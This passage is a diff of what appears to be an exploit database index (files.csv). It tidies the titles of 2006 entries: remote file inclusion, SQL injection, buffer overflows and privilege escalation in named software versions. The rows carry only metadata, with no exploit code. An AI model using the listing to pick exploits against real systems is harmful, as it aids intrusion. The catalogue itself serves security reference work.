1.6 - Multiple Remote File Inclusion",2006-06-27,Kw3[R]Ln,php,webapps,0 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection",2006-06-27,simo64,php,webapps,0 -1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack/SEH Buffer Overflow",2006-06-27,FistFuXXer,windows,local,0 -1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include",2006-06-28,marriottvn,php,webapps,0 +1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack/Buffer Overflow (SEH)",2006-06-27,FistFuXXer,windows,local,0 +1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Inclusion",2006-06-28,marriottvn,php,webapps,0 1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0 -1962,platforms/osx/local/1962.pl,"Apple Mac OS X 10.4.6 (x86) - 'launchd' Local Format String Exploit",2006-06-28,"Kevin Finisterre",osx,local,0 +1962,platforms/osx/local/1962.pl,"Apple Mac OSX 10.4.6 (x86) - 'launchd' Local Format String",2006-06-28,"Kevin Finisterre",osx,local,0 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0 1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution",2006-06-29,rgod,php,webapps,0 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,windows,remote,445 @@ -1682,7 +1682,7 @@ id,file,description,date,author,platform,type,port 1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 - (dbinstall.php) Remote File Inclusion",2006-07-01,"Hamid Ebadi",php,webapps,0 1971,platforms/php/webapps/1971.txt,"Randshop 1.1.1 - (header.inc.php) Remote File Inclusion",2006-07-01,OLiBekaS,php,webapps,0 1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0 -1973,platforms/osx/local/1973.pl,"Apple Mac OS X 10.4.6 (PPC) - 'launchd' Local Format String Exploit",2006-07-01,"Kevin Finisterre",osx,local,0 +1973,platforms/osx/local/1973.pl,"Apple Mac OSX 10.4.6 (PPC) - 'launchd' Local Format String",2006-07-01,"Kevin Finisterre",osx,local,0 1974,platforms/php/webapps/1974.txt,"SmartSiteCMS 1.0 - (root) Multiple Remote File Inclusion",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 1975,platforms/php/webapps/1975.pl,"BXCP 0.3.0.4 - (where) SQL Injection",2006-07-02,x23,php,webapps,0 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - CG_ServerCommand() Remote Overflow",2006-07-02,RunningBon,windows,dos,0 @@ -1701,16 +1701,16 @@ id,file,description,date,author,platform,type,port 1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow",2006-07-07,"H D Moore",windows,dos,0 1991,platforms/php/webapps/1991.php,"Pivot 1.30 RC2 - Privilege Escalation / Remote Code Execution",2006-07-07,rgod,php,webapps,0 1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 - (SFX Path) Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0 -1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure Exploit",2006-07-07,rgod,php,webapps,0 +1993,platforms/php/webapps/1993.php,"PAPOO 3_RC3 - SQL Injection / Admin Credentials Disclosure",2006-07-07,rgod,php,webapps,0 1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component 1.1.0 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component 1.2.4RC3 - Remote File Inclusion",2006-07-08,h4ntu,php,webapps,0 1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO 2.2.4 - (pluginpath) Remote File Inclusion",2006-07-09,A.nosrati,php,webapps,0 -1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (PHP)",2006-07-09,joffer,multiple,remote,10000 +1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,multiple,remote,10000 1998,platforms/php/webapps/1998.pl,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (2)",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 1999,platforms/windows/local/1999.pl,"Microsoft Word 2000/2003 - Hlink Local Buffer Overflow (PoC)",2006-07-09,"SYS 49152",windows,local,0 2000,platforms/hardware/dos/2000.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow (PoC)",2006-07-10,"Michael Thumann",hardware,dos,0 2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 - Unchecked Boundary Condition",2006-07-10,"naveed afzal",windows,dos,0 -2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0 +2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - (descripcion) Remote Command Execution",2006-07-10,Hessam-x,php,webapps,0 2003,platforms/php/webapps/2003.txt,"SQuery 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0 2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Privilege Escalation (2)",2006-07-12,"Julien Tinnes",linux,local,0 @@ -1725,7 +1725,7 @@ id,file,description,date,author,platform,type,port 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow",2006-07-15,"Pablo Isola",windows,remote,515 2015,platforms/linux/local/2015.py,"Rocks Clusters 4.1 - (umount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0 2016,platforms/linux/local/2016.sh,"Rocks Clusters 4.1 - (mount-loop) Privilege Escalation",2006-07-15,"Xavier de Leon",linux,local,0 -2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (Perl)",2006-07-15,UmZ,multiple,remote,10000 +2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)",2006-07-15,UmZ,multiple,remote,10000 2018,platforms/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - (class.rich.php) Remote File Inclusion",2006-07-16,igi,php,webapps,0 2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - (m2f_root_path) Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 2020,platforms/php/webapps/2020.txt,"com_videodb Mambo Component 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0 @@ -1743,7 +1743,7 @@ id,file,description,date,author,platform,type,port 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Blind SQL Injection",2006-07-18,"Jacek Wlodarczyk",php,webapps,0 2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",php,webapps,0 2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0 -2035,platforms/php/webapps/2035.php,"ToendaCMS 1.0.0 - 'FCKeditor' Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0 +2035,platforms/php/webapps/2035.php,"ToendaCMS 1.0.0 - 'FCKeditor' Arbitrary File Upload",2006-07-18,rgod,php,webapps,0 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0 2037,platforms/windows/dos/2037.c,"Dumb 0.9.3 - (it_read_envelope) Remote Heap Overflow (PoC)",2006-07-19,"Luigi Auriemma",windows,dos,0 2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 - (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0 @@ -1757,7 +1757,7 @@ id,file,description,date,author,platform,type,port 2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow (2)",2006-07-21,bannedit,multiple,remote,110 2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 2056,platforms/windows/local/2056.c,"Microsoft IIS - ASP Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local,0 -2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0 +2057,platforms/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)",2006-07-21,cocoruder,windows,dos,0 2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 2059,platforms/hardware/dos/2059.cpp,"D-Link Router - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - (help.php) Remote File Inclusion",2006-07-23,magnific,php,webapps,0 @@ -1767,12 +1767,12 @@ id,file,description,date,author,platform,type,port 2064,platforms/php/webapps/2064.txt,"Mam-Moodle Mambo Component alpha - Remote File Inclusion",2006-07-23,jank0,php,webapps,0 2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0 2066,platforms/php/webapps/2066.txt,"multibanners Mambo Component 1.0.1 - Remote File Inclusion",2006-07-23,Blue|Spy,php,webapps,0 -2067,platforms/solaris/local/2067.c,"Solaris 10 - sysinfo() Local Kernel Memory Disclosure Exploit",2006-07-24,prdelka,solaris,local,0 +2067,platforms/solaris/local/2067.c,"Solaris 10 - sysinfo() Local Kernel Memory Disclosure",2006-07-24,prdelka,solaris,local,0 2068,platforms/php/webapps/2068.php,"X7 Chat 2.0.4 - (old_prefix) Blind SQL Injection",2006-07-24,rgod,php,webapps,0 2069,platforms/php/webapps/2069.txt,"PrinceClan Chess Mambo Com 0.8 - Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 -2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow Exploit",2006-07-24,"Jacopo Cervini",windows,remote,5060 -2071,platforms/php/webapps/2071.php,"Etomite CMS 0.6.1 - 'username' SQL Injection (mq = off)",2006-07-25,rgod,php,webapps,0 -2072,platforms/php/webapps/2072.php,"Etomite CMS 0.6.1 - (rfiles.php) Remote Command Execution Exploit",2006-07-25,rgod,php,webapps,0 +2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",windows,remote,5060 +2071,platforms/php/webapps/2071.php,"Etomite CMS 0.6.1 - ''Username'' SQL Injection (mq = off)",2006-07-25,rgod,php,webapps,0 +2072,platforms/php/webapps/2072.php,"Etomite CMS 0.6.1 - (rfiles.php) Remote Command Execution",2006-07-25,rgod,php,webapps,0 2073,platforms/multiple/dos/2073.c,"libmikmod 3.2.2 - (GT2 loader) Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",multiple,dos,0 2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow (1) (Metasploit)",2006-07-26,ri0t,windows,remote,10616 2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow (2) (Metasploit)",2006-07-26,ri0t,windows,remote,0 @@ -1793,7 +1793,7 @@ id,file,description,date,author,platform,type,port 2090,platforms/php/webapps/2090.txt,"Joomla com_bayesiannaivefilter Component 1.1 - Inclusion",2006-07-30,Pablin77,php,webapps,0 2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution (French)",2006-07-30,NSRocket,windows,local,0 2092,platforms/php/webapps/2092.txt,"Joomla LMO Component 1.0b2 - Remote File Inclusion",2006-07-30,vitux,php,webapps,0 -2094,platforms/windows/local/2094.c,"Open Cubic Player 2.6.0pre6 / 0.1.10_rc5 - Multiple Buffer Overflow Exploit",2006-07-31,"Luigi Auriemma",windows,local,0 +2094,platforms/windows/local/2094.c,"Open Cubic Player 2.6.0pre6 / 0.1.10_rc5 - Multiple Buffer Overflow",2006-07-31,"Luigi Auriemma",windows,local,0 2095,platforms/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 - (pathtohomedir) Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 2096,platforms/php/webapps/2096.txt,"MyNewsGroups 0.6b - (myng_root) Remote Inclusion",2006-07-31,"Philipp Niedziela",php,webapps,0 2097,platforms/php/webapps/2097.txt,"NewsLetter 3.5 - (NL_PATH) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 @@ -1805,17 +1805,17 @@ id,file,description,date,author,platform,type,port 2103,platforms/php/webapps/2103.txt,"k_shoutbox 4.4 - Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0 2104,platforms/php/webapps/2104.txt,"k_fileManager 1.2 - (dwl_include_path) Remote File Inclusion",2006-08-01,SHiKaA,php,webapps,0 2105,platforms/php/webapps/2105.php,"XMB 1.9.6 - (u2uid) SQL Injection (mq=off)",2006-08-01,rgod,php,webapps,0 -2106,platforms/osx/local/2106.pl,"Apple Mac OS X 10.4.7 (x86) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 -2107,platforms/osx/local/2107.pl,"Apple Mac OS X 10.4.7 (PPC) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 -2108,platforms/osx/local/2108.sh,"Apple Mac OS X 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 +2106,platforms/osx/local/2106.pl,"Apple Mac OSX 10.4.7 (x86) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 +2107,platforms/osx/local/2107.pl,"Apple Mac OSX 10.4.7 (PPC) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 +2108,platforms/osx/local/2108.sh,"Apple Mac OSX 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 2109,platforms/php/webapps/2109.txt,"WoW Roster 1.70 - (/lib/phpBB.php) Remote File Inclusion",2006-08-02,|peti,php,webapps,0 2110,platforms/php/webapps/2110.pm,"TWiki 4.0.4 - (Configure Script) Remote Code Execution (Metasploit)",2006-08-02,"David Maciejak",php,webapps,0 -2111,platforms/osx/local/2111.pl,"Apple Mac OS X 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow Exploit (2)",2006-08-02,"Kevin Finisterre",osx,local,0 +2111,platforms/osx/local/2111.pl,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow (2)",2006-08-02,"Kevin Finisterre",osx,local,0 2113,platforms/php/webapps/2113.txt,"SaveWeb Portal 3.4 - (SITE_Path) Remote File Inclusion",2006-08-02,"Mehmet Ince",php,webapps,0 2114,platforms/php/webapps/2114.htm,"TinyPHP Forum 3.6 - (makeAdmin) Remote Admin Maker Exploit",2006-08-02,SirDarckCat,php,webapps,0 2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0 2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - (colorswitch.php) Remote File Inclusion",2006-08-02,beford,php,webapps,0 -2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access Exploit",2006-08-03,rgod,php,webapps,0 +2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0 2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections",2006-08-07,rgod,php,webapps,0 2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 @@ -1840,7 +1840,7 @@ id,file,description,date,author,platform,type,port 2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-08-07,ri0t,windows,remote,10616 2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 - (cfg_dir) Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 -2143,platforms/php/webapps/2143.pl,"TWiki 4.0.4 - (configure) Remote Command Execution Exploit",2006-08-07,"Javier Olascoaga",php,webapps,0 +2143,platforms/php/webapps/2143.pl,"TWiki 4.0.4 - (configure) Remote Command Execution",2006-08-07,"Javier Olascoaga",php,webapps,0 2144,platforms/linux/local/2144.sh,"liblesstif 2-0.93.94-4mdk - (DEBUG_FILE) Privilege Escalation",2006-08-08,"Karol Wiesek",linux,local,0 2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0 2146,platforms/php/webapps/2146.txt,"docpile:we 0.2.2 - (INIT_PATH) Remote File Inclusion",2006-08-08,"Mehmet Ince",php,webapps,0 @@ -1875,7 +1875,7 @@ id,file,description,date,author,platform,type,port 2175,platforms/php/webapps/2175.txt,"WEBinsta CMS 0.3.1 - (templates_dir) Remote File Inclusion",2006-08-12,K-159,php,webapps,0 2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0 2177,platforms/php/webapps/2177.txt,"Joomla Webring Component 1.0 - Remote File Inclusion",2006-08-13,"Mehmet Ince",php,webapps,0 -2178,platforms/php/webapps/2178.php,"XMB 1.9.6 Final - basename() Remote Command Execution Exploit",2006-08-13,rgod,php,webapps,0 +2178,platforms/php/webapps/2178.php,"XMB 1.9.6 Final - basename() Remote Command Execution",2006-08-13,rgod,php,webapps,0 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0 2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,multiple,dos,0 2181,platforms/php/webapps/2181.pl,"PHPay 2.02 - (nu_mail.inc.php) Remote mail() Injection",2006-08-14,beford,php,webapps,80 @@ -1902,9 +1902,9 @@ id,file,description,date,author,platform,type,port 2203,platforms/php/webapps/2203.txt,"Joomla com_jim Component 1.0.1 - Remote File Inclusion",2006-08-17,"Mehmet Ince",php,webapps,0 2204,platforms/windows/dos/2204.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (3)",2006-08-17,Preddy,windows,dos,0 2205,platforms/php/webapps/2205.txt,"Joomla Mosets Tree 1.0 - Remote File Inclusion",2006-08-17,Crackers_Child,php,webapps,0 -2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component 1.2 RC2b - File Include",2006-08-17,Cmaster4,php,webapps,0 -2207,platforms/php/webapps/2207.txt,"Mambo a6mambocredits Component 1.0.0 - File Include",2006-08-17,Cmaster4,php,webapps,0 -2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash Exploit",2006-08-18,Mr.Niega,windows,dos,0 +2206,platforms/php/webapps/2206.txt,"Mambo phpShop Component 1.2 RC2b - File Inclusion",2006-08-17,Cmaster4,php,webapps,0 +2207,platforms/php/webapps/2207.txt,"Mambo a6mambocredits Component 1.0.0 - File Inclusion",2006-08-17,Cmaster4,php,webapps,0 +2208,platforms/windows/dos/2208.html,"Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash",2006-08-18,Mr.Niega,windows,dos,0 2209,platforms/php/webapps/2209.txt,"Joomla Artlinks Component 1.0b4 - Remote File Inclusion",2006-08-18,camino,php,webapps,0 2210,platforms/windows/dos/2210.c,"Microsoft Windows - '.png' File IHDR Block Denial of Service PoC (2)",2006-08-18,vegas78,windows,dos,0 2211,platforms/php/webapps/2211.txt,"PHlyMail Lite 3.4.4 - (mod.listmail.php) Remote File Inclusion",2006-08-18,Kacper,php,webapps,0 @@ -1920,8 +1920,8 @@ id,file,description,date,author,platform,type,port 2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component 0.6b - Include",2006-08-19,mdx,php,webapps,0 2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 -2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - (adminlog) Remote File Include",2006-08-19,SHiKaA,php,webapps,0 -2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component 1.1 - File Include",2006-08-19,mdx,php,webapps,0 +2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - (adminlog) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 +2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0 2226,platforms/php/webapps/2226.txt,"NES Game and NES System c108122 - File Inclusion",2006-08-20,Kacper,php,webapps,0 2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - (mainnav) Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0 @@ -1937,7 +1937,7 @@ id,file,description,date,author,platform,type,port 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service",2006-08-21,nop,windows,dos,0 2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - (checklevel.php) Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0 2240,platforms/php/webapps/2240.txt,"HPE 1.0 - (HPEinc) Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0 -2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 +2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure",2006-08-22,"Marco Ivaldi",solaris,local,0 2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 - (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 2243,platforms/php/webapps/2243.php,"Simple Machines Forum 1.1 rc2 - Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service",2006-08-22,"Tomas Kempinsky",multiple,dos,0 @@ -1948,8 +1948,8 @@ id,file,description,date,author,platform,type,port 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0 2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 2251,platforms/php/webapps/2251.pl,"VistaBB 2.x - (functions_mod_user.php) Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 -2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 <= 2006.2a (lng) - Remote Command Execution Exploit",2006-08-24,Hessam-x,php,webapps,0 -2253,platforms/php/webapps/2253.php,"Phaos 0.9.2 - basename() Remote Command Execution Exploit",2006-08-24,Kacper,php,webapps,0 +2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 <= 2006.2a (lng) - Remote Command Execution",2006-08-24,Hessam-x,php,webapps,0 +2253,platforms/php/webapps/2253.php,"Phaos 0.9.2 - basename() Remote Command Execution",2006-08-24,Kacper,php,webapps,0 2254,platforms/php/webapps/2254.txt,"PHPCOIN 1.2.3 - (session_set.php) Remote File Inclusion",2006-08-24,Timq,php,webapps,0 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0 2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 @@ -1979,12 +1979,12 @@ id,file,description,date,author,platform,type,port 2280,platforms/php/webapps/2280.pl,"Lanifex DMO 2.3b - (_incMgr) Remote File Inclusion",2006-08-30,Kacper,php,webapps,0 2281,platforms/php/webapps/2281.pl,"Pheap CMS 1.1 - (lpref) Remote File Inclusion",2006-08-31,Kacper,php,webapps,0 2282,platforms/php/webapps/2282.txt,"YACS CMS 6.6.1 - context[path_to_root] Remote File Inclusion",2006-08-31,MATASANOS,php,webapps,0 -2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - (add router) Remote Buffer Overflow Exploit",2006-09-01,"Andres Tarasco",windows,remote,0 +2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - (add router) Remote Buffer Overflow",2006-09-01,"Andres Tarasco",windows,remote,0 2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor Local Exploit",2006-09-01,"Andres Tarasco",windows,local,0 2285,platforms/php/webapps/2285.txt,"MyBace Light - 'login_check.php' Remote File",2006-09-01,"Philipp Niedziela",php,webapps,0 2286,platforms/windows/local/2286.cpp,"PowerZip 7.06.38950 - Long Filename Handling Buffer Overflow",2006-09-01,bratax,windows,local,0 2287,platforms/asp/webapps/2287.txt,"icblogger 2.0 - (YID) SQL Injection",2006-09-01,"Chironex Fleckeri",asp,webapps,0 -2288,platforms/php/webapps/2288.php,"TikiWiki 1.9 Sirius - (jhot.php) Remote Command Execution Exploit",2006-09-02,rgod,php,webapps,0 +2288,platforms/php/webapps/2288.php,"TikiWiki 1.9 Sirius - (jhot.php) Remote Command Execution",2006-09-02,rgod,php,webapps,0 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0 2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0 2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0 @@ -1996,7 +1996,7 @@ id,file,description,date,author,platform,type,port 2297,platforms/php/webapps/2297.pl,"Tr Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit",2006-09-04,DarkFig,php,webapps,0 2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - (templates_dir) Remote Code Execution",2006-09-04,Kacper,php,webapps,0 2299,platforms/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution",2006-09-04,Kacper,php,webapps,0 -2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - (cmd) Remote Command Execution Exploit",2006-09-04,DarkFig,php,webapps,0 +2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - (cmd) Remote Command Execution",2006-09-04,DarkFig,php,webapps,0 2301,platforms/php/webapps/2301.txt,"MySpeach 3.0.2 - (my_ms[root]) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 2302,platforms/windows/dos/2302.pl,"J. River Media Center 11.0.309 - Remote Denial of Service (PoC)",2006-09-05,n00b,windows,dos,0 2303,platforms/multiple/dos/2303.html,"dsock 1.3 - (buf) Remote Buffer Overflow (PoC)",2006-09-05,DaveK,multiple,dos,0 @@ -2018,7 +2018,7 @@ id,file,description,date,author,platform,type,port 2319,platforms/php/webapps/2319.txt,"Fire Soft Board RC 3 - (racine) Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 - (Redirect.bat) Directory Traversal",2006-09-07,"Daniel Clemens",windows,remote,411 2321,platforms/php/webapps/2321.php,"DokuWiki 2006-03-09b - 'dwpage.php' Remote Code Execution",2006-09-07,rgod,php,webapps,0 -2322,platforms/php/webapps/2322.php,"DokuWiki 2006-03-09b - 'dwpage.php' System Disclosure Exploit",2006-09-07,rgod,php,webapps,0 +2322,platforms/php/webapps/2322.php,"DokuWiki 2006-03-09b - 'dwpage.php' System Disclosure",2006-09-07,rgod,php,webapps,0 2323,platforms/php/webapps/2323.txt,"PhpNews 1.0 - 'Include' Remote File Inclusion",2006-09-07,"the master",php,webapps,0 2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 - 'header.php' Remote File 